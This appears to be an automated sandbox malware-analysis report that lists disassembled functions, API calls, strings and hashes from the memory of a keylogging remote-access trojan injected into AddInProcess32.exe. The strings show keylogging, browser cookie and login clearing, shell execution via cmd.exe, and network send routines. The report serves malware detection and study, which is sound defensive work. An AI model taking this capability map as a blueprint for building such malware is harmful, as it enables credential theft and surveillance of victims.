                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                        • String ID: (FG
                                                                                                        • API String ID: 3142014140-2273637114
                                                                                                        • Opcode ID: 3dd28efe5d76cee74ea6306897125a5d17a8e39bd8f4c177ad1c2a9bab0656b7
                                                                                                        • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                        • Opcode Fuzzy Hash: 3dd28efe5d76cee74ea6306897125a5d17a8e39bd8f4c177ad1c2a9bab0656b7
                                                                                                        • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                        Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                        • _free.LIBCMT ref: 0044D5C5
                                                                                                          • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                          • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                                          • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                        • String ID: *?$.
                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                        • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                        • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                        • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                        • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                        Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                          • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                        • String ID: XCG$`AG$>G
                                                                                                        • API String ID: 2334542088-2372832151
                                                                                                        • Opcode ID: e67731c2ca2cd1ff7fa0b2f8b36e1bf7c54a8ac1d8c345ee0f34ef58a03dc72b
                                                                                                        • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                        • Opcode Fuzzy Hash: e67731c2ca2cd1ff7fa0b2f8b36e1bf7c54a8ac1d8c345ee0f34ef58a03dc72b
                                                                                                        • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                        Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00442714
                                                                                                        • _free.LIBCMT ref: 004427DF
                                                                                                        • _free.LIBCMT ref: 004427E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$FileModuleName
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        • API String ID: 2506810119-760905667
                                                                                                        • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                        • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                        • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                        • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                        Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                        • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EventObjectSingleWaitsend
                                                                                                        • String ID: LAL
                                                                                                        • API String ID: 3963590051-3302426157
                                                                                                        • Opcode ID: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                        • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                        • Opcode Fuzzy Hash: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                        • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                        Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                        • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                        • API String ID: 368326130-2663660666
                                                                                                        • Opcode ID: 5f1f106a8e53b5b8e53ee6433b744230dbb61b51347ea29cf6ce568f23d562fb
                                                                                                        • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                        • Opcode Fuzzy Hash: 5f1f106a8e53b5b8e53ee6433b744230dbb61b51347ea29cf6ce568f23d562fb
                                                                                                        • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                        Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                        • wsprintfW.USER32 ref: 0040A905
                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EventLocalTimewsprintf
                                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                        • API String ID: 1497725170-1359877963
                                                                                                        • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                        • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                        • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                        • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                        Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                                        • String ID: Online Keylogger Started
                                                                                                        • API String ID: 112202259-1258561607
                                                                                                        • Opcode ID: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                                        • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                        • Opcode Fuzzy Hash: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                                        • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                        Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                        • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                        • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                        • String ID: `@
                                                                                                        • API String ID: 2583163307-951712118
                                                                                                        • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                        • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                        • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                        • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                        Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                                        • String ID: Connection Timeout
                                                                                                        • API String ID: 2055531096-499159329
                                                                                                        • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                        • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                        • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                        • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                        Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                        • String ID: bad locale name
                                                                                                        • API String ID: 3628047217-1405518554
                                                                                                        • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                        • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                        • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                        • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                        Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID: /C $cmd.exe$open
                                                                                                        • API String ID: 587946157-3896048727
                                                                                                        • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                        • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                        • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                        • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                        Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                        • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 3123878439-4028850238
                                                                                                        • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                        • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                        • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                        • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                        Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: GetCursorInfo$User32.dll
                                                                                                        • API String ID: 1646373207-2714051624
                                                                                                        • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                        • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                        • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                        • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                        Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                                                        • API String ID: 2574300362-1519888992
                                                                                                        • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                        • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                        • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                        • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                        Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1036877536-0
                                                                                                        • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                        • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                        • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                        • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                        Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                        • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                        • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                        • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                        Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                        • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                        • API String ID: 3472027048-1236744412
                                                                                                        • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                        • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                        • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                        • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                        Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                        • String ID: @CG$exepath$BG
                                                                                                        • API String ID: 4119054056-3221201242
                                                                                                        • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                        • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                        • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                        • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                        Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                          • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                          • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                                                        • String ID: [ $ ]
                                                                                                        • API String ID: 3309952895-93608704
                                                                                                        • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                        • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                        • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
